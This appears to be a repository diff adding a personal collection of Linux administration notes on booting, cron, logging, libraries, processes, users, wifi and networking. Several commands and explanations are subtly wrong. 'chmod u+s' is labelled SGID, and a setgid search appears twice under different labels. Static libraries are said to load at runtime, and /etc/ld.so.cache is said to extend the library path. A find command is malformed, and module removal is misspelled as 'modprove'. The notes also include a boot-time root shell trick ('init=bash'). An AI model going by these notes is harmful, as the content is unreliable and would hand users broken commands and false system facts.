||||
|
||||
|
||||
# Files
|
||||
|
||||
> file example.txt
|
||||
|
||||
This shows info about a file.
|
||||
|
||||
# Further reading
|
||||
|
||||
[Hund](https://hund0b1.gitlab.io/2019/02/11/a-collection-of-handy-ways-of-manipulating-text-in-bash.html) has some fantastic examples.
|
||||
|
||||
|
98
fundamentals/boot.md
Normal file
98
fundamentals/boot.md
Normal file
@ -0,0 +1,98 @@
|
||||
# Basic Startup
|
||||
|
||||
BIOS > MBR > GRUB > Kernel > Init > Run Level
|
||||
|
||||
- The BIOS identifies system hardware.
|
||||
|
||||
- The Master Boot Record contains partition and filesystem data.
|
||||
|
||||
- The Grand Unified Bootloader executes the kernel.
|
||||
|
||||
- The Init Executes designates run level (via SysVinit, Upstart, or Systemd).
|
||||
|
||||
- Run Level starts the user's session.
|
||||
|
||||
The Master Boot Record is a 512 byte file called boot.img which starts the first sectore of core.img into memory (GRUB Stage 1.5), which then executes /boot/grub.
|
||||
|
||||
# Access system
|
||||
|
||||
Ctrl+c at boot then add in
|
||||
|
||||
> rw init=bash
|
||||
|
||||
# Run Levels
|
||||
|
||||
0: Half
|
||||
1: Single user mode
|
||||
2: Multi-user, without NFS
|
||||
3: Full multi-user mode
|
||||
4: Unused
|
||||
5: X11
|
||||
6: Reboot
|
||||
|
||||
None of this is used by humans anymore - it's all systemd.
|
||||
|
||||
# Systemd
|
||||
|
||||
See what's running with ....
|
||||
|
||||
> systemctl list-units
|
||||
|
||||
Stop, start, whatever with:
|
||||
|
||||
systemctl enable|stop|start httpd
|
||||
|
||||
This starts httpd (Fedora's word for Apache2).
|
||||
|
||||
# Boot Records
|
||||
|
||||
'File System Tab' under /etc/fstab keeps track of the partitions and boot order.
|
||||
|
||||
The logical voluem manager (LVM) can make non-hardware partitions.
|
||||
|
||||
The nomenclature is:
|
||||
|
||||
- PV = physical volume
|
||||
|
||||
- LV = logical volume
|
||||
|
||||
- VG = volume group
|
||||
|
||||
# Volume Groups
|
||||
|
||||
> sudo vgcreate work-volume /dev/sdb2 /dev/sdb4
|
||||
|
||||
This creates the volume group 'work-volume', consisting in sdb2 and sdb4.
|
||||
|
||||
Now you ahve a volume group, you can use it as part of a new logical volume.
|
||||
|
||||
> sudo lvcreate -n noob-lv work-volume
|
||||
|
||||
Then scan for all logical volumes on the system with lvscan.
|
||||
|
||||
> sudo lvscan
|
||||
|
||||
# GRUB
|
||||
|
||||
Install a grub with either:
|
||||
|
||||
> sudo grub-install /dev/sda
|
||||
|
||||
or
|
||||
|
||||
> sudo grub2-install /dev/sda
|
||||
|
||||
This takes all settings from /etc/fstab.
|
||||
|
||||
Then when done editing settings update the script in /boot/grub/grub.cfg (in Debian) or /boot/boot/grub/menu (in other systems).
|
||||
|
||||
There are default examples in /etc/grub.d/ (but not on Ubuntu).
|
||||
|
||||
Finalize your settings with grub-mkconfig (or grub2-mkconfig), or update-grub.
|
||||
|
||||
# Cowardice
|
||||
|
||||
If you can't do that, use boot-repair:
|
||||
|
||||
> help.ubuntu.com/community/Boot-Repair
|
||||
|
18
fundamentals/character-encoding.md
Normal file
18
fundamentals/character-encoding.md
Normal file
@ -0,0 +1,18 @@
|
||||
Convert a text file from one encoding type to another with:
|
||||
|
||||
> iconv -f ascii -t utf8 oldfilename > newfilename
|
||||
|
||||
Available options are:
|
||||
|
||||
* ISO-8859-15
|
||||
|
||||
* UTF-8
|
||||
|
||||
* ASCII
|
||||
|
||||
* Lots more
|
||||
|
||||
Generate a full list of encoding types available with:
|
||||
|
||||
> iconv -l
|
||||
|
34
fundamentals/clock.md
Normal file
34
fundamentals/clock.md
Normal file
@ -0,0 +1,34 @@
|
||||
# Basics
|
||||
|
||||
Show system time:
|
||||
|
||||
> date
|
||||
|
||||
Show hardware time:
|
||||
|
||||
> sudo hwclock -r
|
||||
|
||||
Change system time to match hardware time:
|
||||
|
||||
> sudo hwclock --hctosys
|
||||
|
||||
Change hardware time to match system time:
|
||||
|
||||
> sudo hwclock --systohc
|
||||
|
||||
Manually set the hardware time to a specified date:
|
||||
|
||||
> sudo hwclock --set --date="8/25/19 13:30:00"
|
||||
|
||||
# Network Time Providers
|
||||
|
||||
Servers which take their time from an observatory we call Stratum 1 servers. Servers which takes their time from Stratum n servers are Stratum n+1 servers.
|
||||
|
||||
Install ntp with:
|
||||
|
||||
> sudo apt-get install -y ntp
|
||||
|
||||
The shell command for this is `ntpq`. Monitor the service providers using:
|
||||
|
||||
> ntpq -p
|
||||
|
84
fundamentals/conditionals.md
Normal file
84
fundamentals/conditionals.md
Normal file
@ -0,0 +1,84 @@
|
||||
# If statements
|
||||
|
||||
Test statement equality as so:
|
||||
|
||||
```
|
||||
|
||||
read t1
|
||||
read t2
|
||||
if test $t1 != $t2; then
|
||||
echo 'variables do not match'
|
||||
else
|
||||
echo 'variables match'
|
||||
fi
|
||||
exit 0
|
||||
|
||||
```
|
||||
|
||||
# Case Structure
|
||||
|
||||
These deal with multiple states rather than forking conditions.
|
||||
|
||||
Example:
|
||||
|
||||
```
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
# Simple case demonstration
|
||||
|
||||
echo "What's your favourite creature?"
|
||||
read CRE
|
||||
case $CRE in
|
||||
human | humanoids ) echo "Why is $CRE always standard?"
|
||||
;;
|
||||
troll | monsters ) echo "Not exactly known for their character ..."
|
||||
;;
|
||||
owlbears | monsters ) echo "Really you're a wizard fan"
|
||||
;;
|
||||
esac
|
||||
|
||||
# While and Until
|
||||
This prints from 10 until 2.
|
||||
|
||||
> declare -i COUNTER
|
||||
|
||||
> COUNTER=10
|
||||
|
||||
> while [ $COUNTER -gt 2 ]; do
|
||||
|
||||
> echo The counter is $COUNTER
|
||||
|
||||
> COUNTER=COUNTER-1
|
||||
|
||||
> done
|
||||
|
||||
> exit 0
|
||||
|
||||
```
|
||||
|
||||
|
||||
There's also 'until', which stops when something is true, rather than keeping going when something is true.
|
||||
|
||||
# For
|
||||
|
||||
> for i in $( ls ); do
|
||||
> du -sh $i
|
||||
> done
|
||||
|
||||
# Sequences
|
||||
|
||||
The sequences tool counts up from X in jumps of Y to number Z.
|
||||
|
||||
Count from 1 to 10.
|
||||
|
||||
> seq 10
|
||||
|
||||
Count from 4 to 11.
|
||||
|
||||
> seq 4 11
|
||||
|
||||
Count from 1 to 100 in steps of 5.
|
||||
|
||||
> seq 1 5 100
|
||||
|
44
fundamentals/cron.md
Normal file
44
fundamentals/cron.md
Normal file
@ -0,0 +1,44 @@
|
||||
Anacron manages crontabs which might not have run because the machine was turned off. The first value shows the days between runs, the second shows how many minutes to wait after a boot to run.
|
||||
|
||||
For example:
|
||||
|
||||
> cat /etc/anacrontab
|
||||
|
||||
`7 15 cron.daily run-parts --report /etc/cron.daily`
|
||||
|
||||
This would run crontab every 7 days, and wait 15 minutes until after boot to run.
|
||||
|
||||
|
||||
Various services from cron exist, e.g.
|
||||
|
||||
> sudo apt -y install cronie
|
||||
|
||||
start the cronie with
|
||||
|
||||
> sudo systemctl start cronie
|
||||
|
||||
start a cron with
|
||||
|
||||
> cron -e
|
||||
|
||||
You can run a script with:
|
||||
|
||||
*/10 * * * * /home/pi/script.sh
|
||||
|
||||
... which would run every 10 minutes.
|
||||
|
||||
To run something as root, do:
|
||||
|
||||
> sudo crontab -e
|
||||
|
||||
For example, you can update the database, meaning searches with 'locate' command will be faster.
|
||||
|
||||
> */30 * * * * /usr/bin/updatedb
|
||||
|
||||
|
||||
# Testing with runparts
|
||||
|
||||
Run-parts runs all executable scripts in a directory.
|
||||
|
||||
> run-parts /etc/cron.hourly
|
||||
|
21
fundamentals/defaults.md
Normal file
21
fundamentals/defaults.md
Normal file
@ -0,0 +1,21 @@
|
||||
|
||||
Change defaults with the `update-alternatives` command.
|
||||
|
||||
> sudo update-alternatives --config x-www-browser
|
||||
|
||||
Other defaults include:
|
||||
|
||||
* x-cursor-theme
|
||||
|
||||
* x-session-manager
|
||||
|
||||
* x-terminal-emulator
|
||||
|
||||
* x-window-manager
|
||||
|
||||
* x-www-browser
|
||||
|
||||
# Config Location
|
||||
|
||||
The appropriate files are located in /etc/alternatives/x-*
|
||||
|
24
fundamentals/hardware.md
Normal file
24
fundamentals/hardware.md
Normal file
@ -0,0 +1,24 @@
|
||||
|
||||
# Motherboard information
|
||||
|
||||
> sudo dmidecode
|
||||
|
||||
Motherboard info, upgrading BIOS, memory capacity, LAN connections.
|
||||
|
||||
# Disk Format information
|
||||
|
||||
> df
|
||||
|
||||
> df -h
|
||||
|
||||
# CPU
|
||||
|
||||
> cat /proc/cpuinfo
|
||||
|
||||
# Displays
|
||||
|
||||
xrandr, probably.
|
||||
|
||||
List displays ...
|
||||
|
||||
> xrandr --query
|
12
fundamentals/kernel.md
Normal file
12
fundamentals/kernel.md
Normal file
@ -0,0 +1,12 @@
|
||||
# Living Space
|
||||
|
||||
Kernel modules live in lib/modules/$(uname -r)
|
||||
|
||||
Load them with
|
||||
|
||||
> sudo modprobe ath9k
|
||||
|
||||
Or remove one with
|
||||
|
||||
> sudo modprove uvcvideo
|
||||
|
15
fundamentals/keyboard.md
Normal file
15
fundamentals/keyboard.md
Normal file
@ -0,0 +1,15 @@
|
||||
# Set Layout
|
||||
|
||||
Set layout to British English.
|
||||
|
||||
> setxkbmap -layout gb
|
||||
|
||||
| Language | short |
|
||||
|:--------|:------|
|
||||
| Polish | pl |
|
||||
| Serbian | rs |
|
||||
|
||||
Set 'alt + shift', as the command which cycles through the British English, Polish and Serbian keyboard layout.
|
||||
|
||||
> setxkbmap -layout gb,pl,rs -option grp:alt_shift_toggle
|
||||
|
10
fundamentals/kill.md
Normal file
10
fundamentals/kill.md
Normal file
@ -0,0 +1,10 @@
|
||||
# Basic Signals
|
||||
|
||||
To see an ordered list of termination signals:
|
||||
|
||||
> kill -l
|
||||
|
||||
1) SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP
|
||||
6) SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1
|
||||
11) SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM
|
||||
|
8
fundamentals/links.md
Normal file
8
fundamentals/links.md
Normal file
@ -0,0 +1,8 @@
|
||||
Link from X to Y.
|
||||
|
||||
> ln -s X ../otherdir/Y
|
||||
|
||||
Links cause ownership headaches. Solve this with -h:
|
||||
|
||||
> chown -h user1 mysymlink
|
||||
|
40
fundamentals/locale.md
Normal file
40
fundamentals/locale.md
Normal file
@ -0,0 +1,40 @@
|
||||
|
||||
A list of supported locales is available at /usr/share/i18n/SUPPORTED
|
||||
|
||||
See a full list with:
|
||||
|
||||
> cat /usr/share/i18n/SUPPORTED
|
||||
|
||||
Take the first portion to generate full locale information for a region:
|
||||
|
||||
> locale-gen ru_RU.UTF-8
|
||||
|
||||
Then use this for the current shell session with
|
||||
|
||||
> LANG=ru_RU.utf8
|
||||
|
||||
Expand this to the entire system with:
|
||||
|
||||
> export LANG=ru_RU.utf8
|
||||
|
||||
You can make this permanent for one user by adding this line to the ~/.profile or ~/.bashrc.
|
||||
|
||||
Make it permanent for the entire system by editing:
|
||||
|
||||
> sudo vim /etc/defaults/locale
|
||||
|
||||
# Variables
|
||||
|
||||
While generally set together, the variables setable are:
|
||||
|
||||
| Variable | Description |
|
||||
|:-------------:|:------------|
|
||||
| LC_TIME | Date and time |
|
||||
| LC_NUMERIC | Nonmonetary numeric formats |
|
||||
| LC_PAPER | A4 vs wrong paper |
|
||||
| LC_ADDRESS | Address formats, for those amazingly concise Polish addresses. |
|
||||
| LC_TELEPHONE | Telephone number formats. |
|
||||
| LC_MEASUREMENT | Metric or Imperial, but no Impetric available. |
|
||||
| LC_IDENTIFICATION | Metadata about the locale information |
|
||||
| LC_ALL | Just everything at once. |
|
||||
|
20
fundamentals/locating.md
Normal file
20
fundamentals/locating.md
Normal file
@ -0,0 +1,20 @@
|
||||
# Quick Search for Files
|
||||
|
||||
`locate file*`
|
||||
|
||||
Locate is fast because it only accesses a database of files which it regularly updates. You can update this with:
|
||||
|
||||
`sudo updatedb`
|
||||
|
||||
# Whereis
|
||||
|
||||
`whereis angband`
|
||||
|
||||
... shows where the angband program is, along with configuration files, and binaries.
|
||||
|
||||
Also `which` shows where a binary file is, and `type` shows aliases.
|
||||
|
||||
`which cmus`
|
||||
|
||||
`type cmus`
|
||||
|
57
fundamentals/logs.md
Normal file
57
fundamentals/logs.md
Normal file
@ -0,0 +1,57 @@
|
||||
# Syslog Management Protocols
|
||||
|
||||
Let's look at the programs filling in things on our /var/log/ directory.
|
||||
|
||||
* rsyslog (common)
|
||||
|
||||
* syslog (old)
|
||||
|
||||
* syslog-ng (lots of content-based filtering)
|
||||
|
||||
* klogd (kernel-focussed)
|
||||
|
||||
# `rsyslog`
|
||||
|
||||
The config rests in /etc/rsyslog.conf, which then references /etc/rsyslog.d/.
|
||||
|
||||
# Systemd
|
||||
This thing makes its own logs with journald, and the journal's own logging system writes to /var/log/journal/ directory, which is then filled with nonsense.
|
||||
|
||||
You can obtain nonsense in systemd's own format by entering:
|
||||
|
||||
journalctl -e
|
||||
|
||||
This thing generates so much nonsense it can crash your system, but can at least be checked with:
|
||||
|
||||
> journalctl --disk-usage
|
||||
|
||||
... in case you can't remember the `du` command.
|
||||
|
||||
You can limit the nonsense by editing the /etc/systemd/journald.conf file, and finding `#SystemMaxFileSize=`
|
||||
|
||||
# Logger
|
||||
|
||||
You can log things at any time with the logger:
|
||||
|
||||
> logger Server is being a dick!
|
||||
|
||||
Put things into a specific log with `-p`. They can enter into, e.g., lpr (printer) log file with a priority of "critical", with:
|
||||
|
||||
> logger -p lpr.crit Help!
|
||||
|
||||
Logfiles rotate around and eventually get deleted. Rotation means they get compressed.
|
||||
|
||||
Edit the config in /etc/logrotate.conf.
|
||||
|
||||
A few apps have their own special log rotation rules, kept in /etc/logrotate.d/.
|
||||
|
||||
The major variables to change are `weekly`, which compresses log files weekly, and `rotate 4`, which keeps 4 weeks worth of backlogs before deletion.
|
||||
|
||||
# Force Log Rotation
|
||||
|
||||
> sudo systemctl kill --kill-who=main --signal=SIGUSR2 systemd-journald.service
|
||||
|
||||
or just
|
||||
|
||||
> sudo systemctl restart systemd-journald.service
|
||||
|
48
fundamentals/packages.md
Normal file
48
fundamentals/packages.md
Normal file
@ -0,0 +1,48 @@
|
||||
# Looking
|
||||
|
||||
Your package has something to do with unzipping. Find out more:
|
||||
|
||||
> apropos unzip
|
||||
|
||||
# Maintenance
|
||||
|
||||
> dpkg -l
|
||||
|
||||
List what's installed.
|
||||
|
||||
# Libraries
|
||||
|
||||
Libraries under /lib/ typically contain an .so suffix when they're dynamic. It means 'shared object' as a number of programs will refer to it.
|
||||
|
||||
Others will have an /a/ suffix, meaning that they're static, and will be loaded at runtime.
|
||||
|
||||
We can check the dependencies of a program using the ldd command upon anything in a library. For example:
|
||||
|
||||
> ldd/usr/bin/md5sum
|
||||
|
||||
... shows us that md5sum depends upon:
|
||||
|
||||
- linux-vdso.so.1
|
||||
|
||||
- libc.so.6
|
||||
|
||||
- lib64/ld-linux-x86-64.so.2
|
||||
|
||||
To list all libraries, run:
|
||||
|
||||
> ldconfig -p
|
||||
|
||||
For example, if looking at /usr/lib/x86_64-linux-gnu/libXcomposite.so.1, we might wonder what it's for. We can then run:
|
||||
|
||||
> ldconfig -p | grep libXcomposite
|
||||
|
||||
... and find out nothing except that it redirects /usr/lib/x86...
|
||||
|
||||
So at least we know where it is.
|
||||
|
||||
> ldconfig -p | grep usb
|
||||
|
||||
... this will show where things which nominally relate to usbs live.
|
||||
|
||||
You can add to the libarary path by putting just any text file in /etc/ld.so.cache, e.g. in Arch where the path to the fakeroot environment is placed there.
|
||||
|
16
fundamentals/pam.md
Normal file
16
fundamentals/pam.md
Normal file
@ -0,0 +1,16 @@
|
||||
The Pluggabble Authentication Module controls minimum security requirements, such as password lengths.
|
||||
|
||||
Configuration rests in `/etc/pam.d/common-password`, or sometimes `system-auth`.
|
||||
|
||||
The file might be edited to contain:
|
||||
|
||||
```
|
||||
|
||||
password required pam_cracklib.so minlen=12 lcredit=1
|
||||
|
||||
ucredit=1 dcredit=2 ocredit=1
|
||||
|
||||
```
|
||||
|
||||
This would enforce a minimum length of 12 characters for a password, one lowercase character, one upper case character, two digits, and one other (special) character.
|
||||
|
74
fundamentals/processes.md
Normal file
74
fundamentals/processes.md
Normal file
@ -0,0 +1,74 @@
|
||||
# Free
|
||||
|
||||
See free space with:
|
||||
|
||||
> free
|
||||
|
||||
and make it human readable with:
|
||||
|
||||
> free -h
|
||||
|
||||
Or `-m` for megabytes.
|
||||
|
||||
# Proccesses
|
||||
|
||||
See running items in current terminal with
|
||||
|
||||
> ps
|
||||
|
||||
or more with
|
||||
|
||||
> ps -a
|
||||
|
||||
Or the entire system with
|
||||
|
||||
> ps -e
|
||||
|
||||
Or the entire system with more information, BSD style, with:
|
||||
|
||||
> ps aux
|
||||
|
||||
And then search for a particular program with
|
||||
|
||||
> ps aux | grep cmus
|
||||
|
||||
# Jobs
|
||||
|
||||
Pause a job with ^z. Put it in the background with the '&' suffix.
|
||||
|
||||
List jobs in the current shell with
|
||||
|
||||
> jobs
|
||||
|
||||
And then you can pull number 1 up again with
|
||||
|
||||
> fg 1
|
||||
|
||||
Or continue running a stopped job with:
|
||||
|
||||
> bg 1
|
||||
|
||||
# Nice
|
||||
|
||||
This changes how nice a program is, from -20 (horrid) to 19.
|
||||
|
||||
Install a program, but nicely, at nice value '10':
|
||||
|
||||
> nice -10 sudo apt -y install libreoffice
|
||||
|
||||
Aggressively use Steam, with a nice value of '-13'.
|
||||
|
||||
> nice --13 steam&
|
||||
|
||||
Find out that Steam's fucking everything up, so you change its nice value with 'renice':
|
||||
|
||||
> renice --5 -p 3781
|
||||
|
||||
Nerf all of roach-1's processes:
|
||||
|
||||
> renice 10 -u roach-1
|
||||
|
||||
... or the entire group
|
||||
|
||||
> renice -14 -g hackers
|
||||
|
36
fundamentals/shell.md
Normal file
36
fundamentals/shell.md
Normal file
@ -0,0 +1,36 @@
|
||||
# Shells
|
||||
|
||||
Dash - fast but limited funcionality, great for scripts.
|
||||
|
||||
sh - primitive and ubiquitous.
|
||||
|
||||
bash - the standard
|
||||
|
||||
elvish - user-friendly, but new, with a full file-browser embedded into the system.
|
||||
|
||||
# Login
|
||||
|
||||
All shells launch either as login or non-login. All remote sessions without a GUI withl require authentication, and therefore will be login.
|
||||
|
||||
## Login
|
||||
|
||||
These shells start by reading /etc/profile then the first of ~/.bash_profile, ~/.bash_login or ~/.profile, and load all given values.
|
||||
|
||||
## Non-Login
|
||||
|
||||
Non-login shells will read /etc/bash.bashrc and then the ~/.bashrc file. You can summon the different shell perameters with the command `.`.
|
||||
|
||||
For example, so summon the file ~/.bashrc, you can perform:
|
||||
|
||||
`. ~/.bashrc`
|
||||
|
||||
How the logout is handled depends upon ~/.bash_logout
|
||||
|
||||
# Defaults
|
||||
|
||||
The default shell config files to create for a new user are under /etc/skel.
|
||||
|
||||
# Shellcheck
|
||||
|
||||
Run `shellcheck script.sh` on your scripts to check them for mistakes.
|
||||
|
45
fundamentals/swap.md
Normal file
45
fundamentals/swap.md
Normal file
@ -0,0 +1,45 @@
|
||||
# Making a Swap File
|
||||
|
||||
> sudo mkdir -v /var/cache/swap
|
||||
|
||||
> cd /var/cache/swap
|
||||
|
||||
> sudo dd if=/dev/zero of=swapfile bs=1K count=4M
|
||||
|
||||
This creates a swapfile of (1k x 4M) 4 Gigs.
|
||||
Change 4M to XM for an XGig swap.
|
||||
|
||||
> sudo chmod 600 swapfile
|
||||
|
||||
> sudo mkswap swapfile
|
||||
|
||||
> sudo swapon swapfile
|
||||
|
||||
Test it's working with top
|
||||
|
||||
> top -bn1 | grep -i swap
|
||||
|
||||
or:
|
||||
|
||||
> echo "/var/cache/swap/swapfile none swap sw 0 0" | sudo tee -a /etc/fstab
|
||||
|
||||
Test it'll work at boot with:
|
||||
|
||||
> sudo swapoff swapfile
|
||||
|
||||
> sudo swapon -va
|
||||
|
||||
# Partition Swaps
|
||||
|
||||
Put this in /etc/fstab:
|
||||
|
||||
`UUID=blah-blah none swap sw 0 0`
|
||||
|
||||
Then test it works with:
|
||||
|
||||
> sudo swapon -va
|
||||
|
||||
Test other partitions in fstab with:
|
||||
|
||||
> sudo mount -a
|
||||
|
62
fundamentals/time.md
Normal file
62
fundamentals/time.md
Normal file
@ -0,0 +1,62 @@
|
||||
# systemd
|
||||
|
||||
Set time to synchronize with an ntp server:
|
||||
|
||||
> timedatectl set-ntp true
|
||||
|
||||
This info stays in /usr/share/zoneinfo
|
||||
|
||||
# Local Time
|
||||
|
||||
Local time is kept in /etc/localtime.
|
||||
|
||||
According to Dave's LPIC guide, you can set the local time by making asymboling link from your timezone to /etc/localtime, as so:
|
||||
|
||||
> sudo ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
|
||||
|
||||
...however this produced the wrong time for me. Further, /etc/localtime produces an output with cat, while the zoneinfo files do not.
|
||||
|
||||
# Locale
|
||||
|
||||
See local time, language and character settings with:
|
||||
|
||||
> locale
|
||||
|
||||
List available locales with:
|
||||
|
||||
> locale -a
|
||||
|
||||
To see additional locales which are available (but not necessarily installed):
|
||||
|
||||
> cat /usr/share/i18n/SUPPORTED
|
||||
|
||||
Set a supported locale with:
|
||||
|
||||
> locale-gen pl_PL.UTF-8
|
||||
|
||||
Then set that language, with:
|
||||
|
||||
> LANG=pl_PL.UTF-8
|
||||
|
||||
... then reboot.
|
||||
|
||||
# Network Time Protocol
|
||||
|
||||
Enter the shell with:
|
||||
|
||||
> ntpq
|
||||
|
||||
Or just glimpse and overview with:
|
||||
|
||||
> ntpq -q
|
||||
|
||||
This clock can drift, which is then listed under /var/log/ntp.drift
|
||||
|
||||
The config is under /etc/ntp.conf. If a line for the stats directory is listed, it'll log stats, e.g.:
|
||||
|
||||
`statsdir /var/log/ntpstats/`
|
||||
|
||||
This can show if clock drift occurs.
|
||||
|
||||
The config file also lets you specify servers to obtain time from.
|
||||
|
56
fundamentals/users.md
Normal file
56
fundamentals/users.md
Normal file
@ -0,0 +1,56 @@
|
||||
See list of logged on users.
|
||||
|
||||
> w
|
||||
|
||||
See last logons:
|
||||
|
||||
> last
|
||||
|
||||
or all logon attempts, including bad attempts:
|
||||
|
||||
> lastb
|
||||
|
||||
List recently accessed files:
|
||||
|
||||
> last -d
|
||||
|
||||
See files opened by steve
|
||||
|
||||
> lsof -t -u steve
|
||||
|
||||
See files opened by anyone but steve
|
||||
|
||||
> lsof -u ^steve
|
||||
|
||||
Fuser can also track people loggingin:
|
||||
|
||||
> fuser /var/log/syslog
|
||||
|
||||
... and fuser can kill everything accessing the home directory:
|
||||
|
||||
> fuser -km /home
|
||||
|
||||
# Looking for dodgy files
|
||||
|
||||
Some files can be executed by people as if they had super user permissions, and that's okay... sometimes.
|
||||
|
||||
Let's start with files executable by user:
|
||||
|
||||
> sudo find / -type f -perm -g=s -ls
|
||||
|
||||
And then those executable by the group:
|
||||
|
||||
> find / -type f -perm -g=s -ls
|
||||
|
||||
And finally, worrying files, executable by anyone as if sie were the owner:
|
||||
|
||||
> find / -xdev \( -o -nogroup \) -print
|
||||
|
||||
Then have a look at resource usage per user.
|
||||
|
||||
#SGID
|
||||
|
||||
> sudo chmod u+s process.sh
|
||||
|
||||
This will modify process.sh to that instead of being simply executable, anyone executing it will have the permissions as if owner while executing it.
|
||||
|
60
fundamentals/wifi.md
Normal file
60
fundamentals/wifi.md
Normal file
@ -0,0 +1,60 @@
|
||||
# Netstat Stuff
|
||||
|
||||
iftop -p -n
|
||||
Stats on local net usage within domain.
|
||||
|
||||
whois domain.com
|
||||
|
||||
dig domain.com
|
||||
info on domain, whether it's taken, et c.
|
||||
|
||||
> ifconfig
|
||||
Like ipconfig.
|
||||
|
||||
> nmcli
|
||||
Versatile wifi tool.
|
||||
|
||||
# Examples
|
||||
You want to connect to the internet.
|
||||
|
||||
>sudo iwconfig
|
||||
|
||||
Get knowledge of wireless state. The output might be:
|
||||
|
||||
`wlp3s0 IEEE 802.11 ESSID:"Gandalf WajFaj"`
|
||||
|
||||
`Mode:Managed Frequency:2.412 GHz Access Point: 10:05:01:90:AC:1A`
|
||||
|
||||
`Bit Rate=144.4 Mb/s Tx-Power=15 dBm`
|
||||
|
||||
`Retry short limit:7 RTS thr:off Fragment thr:off`
|
||||
|
||||
`Encryption key:off`
|
||||
|
||||
`Power Management:on`
|
||||
|
||||
`Link Quality=64/70 Signal level=-46 dBm`
|
||||
|
||||
`Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag`
|
||||
|
||||
`Tx excessive retries:0 Invalid misc:363 Missed beacon`
|
||||
|
||||
This tells you that your ESSID is 'Gandalf WajFaj', and the access point name is 10:05:......
|
||||
|
||||
> nmcli radio
|
||||
|
||||
You get an overview of your radio devices. You're told that eth0 deals with your ethernet and wlan0 deals with wifi. wlan0 is a file which represents your wifi device.
|
||||
|
||||
> nmcli wlan0 wifi rescan
|
||||
|
||||
> nmcli device wifi list
|
||||
|
||||
Now to connect.
|
||||
|
||||
> nmcli device wifi connect [SSID] [your password] [wifi password]
|
||||
|
||||
Alternatively, you can use
|
||||
|
||||
> nmcli -ask device wifi connect [SSID]
|
||||
And it'll ask for your password, so you're not typing it in in full view.
|
||||
|
4
hardware/brightness.md
Normal file
4
hardware/brightness.md
Normal file
@ -0,0 +1,4 @@
|
||||
# Brightness
|
||||
/sys/class/backlight/*/brightness
|
||||
|
||||
|
8
hardware/monitor.md
Normal file
8
hardware/monitor.md
Normal file
@ -0,0 +1,8 @@
|
||||
See screen size
|
||||
|
||||
> xrandr -q
|
||||
|
||||
Automatically configure:
|
||||
|
||||
> xrandr --auto
|
||||
|
36
hardware/printers.md
Normal file
36
hardware/printers.md
Normal file
@ -0,0 +1,36 @@
|
||||
# Cups: The Common Unix Printing System
|
||||
|
||||
Configure cups at /etc/cups/supsd.conf, or visit the local webpage at http://localhost:631 if you want to use the Apple interface, otherwise, it's the printing daemon.
|
||||
|
||||
# The Printing Daemon
|
||||
|
||||
The printing daemon automatically reads the cups configuration file. It prints with:
|
||||
|
||||
> lp mytext.txt
|
||||
|
||||
Find a list of printers with:
|
||||
|
||||
> lpq
|
||||
|
||||
You can specify a printer with `-d`:
|
||||
|
||||
> lp -d DCP7060D article.pdf
|
||||
|
||||
Alternatively, if you see a printer number, cancel job 33 with:
|
||||
|
||||
> lprm 33
|
||||
|
||||
or just cancel all jobs:
|
||||
|
||||
> lprm -
|
||||
|
||||
See printers on network:
|
||||
|
||||
> lpstat -a
|
||||
|
||||
Block or accept all jobs with:
|
||||
|
||||
> cupsreject DCP7060D
|
||||
|
||||
> cupsaccept DCP7060D
|
||||
|
90
networking/basics.md
Normal file
90
networking/basics.md
Normal file
@ -0,0 +1,90 @@
|
||||
# Protocols
|
||||
|
||||
| TCP | UDP | ICMP |
|
||||
|:-----------------|:-----------------|:------------------|
|
||||
|Transmission Control Protocol | User Datagram Protocol | Internet Control Message Protocol |
|
||||
| Reliable and slow. | Fast but unreliable, such as VOIP. Provides checksums. | Dirty checks such as pings. |
|
||||
|
||||
|
||||
|
||||
|
||||
# Networking Addressing
|
||||
|
||||
## IPv4
|
||||
|
||||
Three address ranges pertain only to private networks, so no computer looks beyond the local router to resolve them:
|
||||
|
||||
10.0.0.0 to 10.255.255.255
|
||||
|
||||
172.16.0.0 to 172.31.255.255
|
||||
|
||||
192.168.0.0 to 192.168.255.255
|
||||
|
||||
In theory, networks should fall within one of 3 ranges, depending upon their first octet:
|
||||
|
||||
Class A 1-127
|
||||
|
||||
Class B 128 to 191
|
||||
|
||||
Class C 192 to 223
|
||||
|
||||
|
||||
|
||||
# Service Ports
|
||||
|
||||
There are three types of port ranges:
|
||||
|
||||
1 to 1023: Well-known and established ports.
|
||||
|
||||
1024 to 49151 ICANN registered ports, used by various products, with limited oversight.
|
||||
|
||||
49152 to 65535 Dynamic ports for ad hoc use.
|
||||
|
||||
View a more complete list of ports with:
|
||||
|
||||
> less /etc/services
|
||||
|
||||
|
||||
# ip
|
||||
|
||||
Show all addresses with:
|
||||
|
||||
> ip a{dd{ress}} s{how}
|
||||
|
||||
If a link's not present, load it with:
|
||||
|
||||
sudo ip link set dev wlp3s0 up
|
||||
|
||||
Add an interface to a device as so:
|
||||
|
||||
> sudo ip a add 192.168.0.15/255.255.255.0 dev eth1
|
||||
|
||||
See network interfaces available on Fedora with:
|
||||
|
||||
> less /etc/sysconfig/network-scripts/ifcfg-enp2s0f0
|
||||
|
||||
or on Debian with:
|
||||
|
||||
> less /etc/network/interfaces
|
||||
|
||||
Mostly, interfaces will receive automatic addresses from a DHCP server. If this hasn't happened for you, you can request a dhcp address with:
|
||||
|
||||
> sudo dhclient eth1
|
||||
|
||||
View your current route to the internet with:
|
||||
|
||||
> route
|
||||
|
||||
... although on void this is:
|
||||
|
||||
> routel
|
||||
|
||||
If you don't have a route to the internet, you can manually specify the default gateway with:
|
||||
|
||||
> sudo route add default gw 192.168.0.1
|
||||
|
||||
... or ...
|
||||
|
||||
> sudo ip route add default via 192.168.0.1
|
||||
|
||||
|
22
networking/dns.md
Normal file
22
networking/dns.md
Normal file
@ -0,0 +1,22 @@
|
||||
# Designate DNS
|
||||
|
||||
On Debian, a file might gain DNS services by adding the following to /etc/network/interfaces:
|
||||
|
||||
----------------
|
||||
auto eth0
|
||||
iface eth0 inet static
|
||||
address 10.0.0.23
|
||||
netmast 255.255.255.0
|
||||
gateway 10.0.0.1
|
||||
dns-nameservers 208.67.222.222 208.67.220.220
|
||||
dns-search example.com
|
||||
|
||||
----------------
|
||||
|
||||
# URL Aliases
|
||||
|
||||
